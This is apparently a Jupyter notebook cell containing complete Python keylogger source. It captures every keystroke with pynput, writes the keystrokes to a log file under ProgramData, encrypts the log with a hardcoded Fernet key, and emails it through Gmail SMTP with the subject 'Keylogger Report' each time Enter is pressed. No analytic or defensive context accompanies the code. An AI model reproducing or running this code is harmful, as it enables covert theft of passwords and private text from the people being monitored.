In [ ]:
from pynput.keyboard import Listener, Key
import logging
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from cryptography.fernet import Fernet

# Set the log file path
log_file = "C:\\ProgramData\\mylog.txt"

# Configure the logger
logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s - %(message)s')

# Generate encryption key
encryption_key = b'I9qf4guuRucF1qdxok8s3tJ5lV+GzrYXjL7pCeBnvwQ='

# Create the Fernet cipher
cipher = Fernet(encryption_key)

# Set email configurations
sender_email = "your_email@gmail.com"
receiver_email = "recipient_email@gmail.com"
password = "your_email_password"

# Define the callback function for key press events
def on_press(key):
    if hasattr(key, 'char'):
        # Handle alphanumeric characters
        logging.info(key.char)
        print(key.char, end="")
    elif key == Key.space:
        # Handle space character
        logging.info(' ')
        print(" ", end="")
    elif key == Key.enter:
        # Handle enter key
        logging.info('\n')
        print("\n")
        send_email(get_log_content())
    elif key == Key.tab:
        # Handle tab key
        logging.info('\t')
        print("\t", end="")
    else:
        # Handle special characters
        logging.info(str(key).replace("'", ""))
        print(str(key).replace("'", ""), end="")

def get_log_content():
    with open(log_file, 'r') as file:
        content = file.read()
    return content

def encrypt_message(message):
    encrypted_message = cipher.encrypt(message.encode())
    return encrypted_message

def send_email(message):
    encrypted_message = encrypt_message(message)

    msg = MIMEMultipart()
    msg['From'] = sender_email
    msg['To'] = receiver_email
    msg['Subject'] = "Keylogger Report"

    body = encrypted_message.decode()
    msg.attach(MIMEText(body, 'plain'))

    with smtplib.SMTP("smtp.gmail.com", 587) as server:
        server.starttls()
        server.login(sender_email, password)
        server.send_message(msg)

# Create a listener
with Listener(on_press=on_press) as listener:
    listener.join()
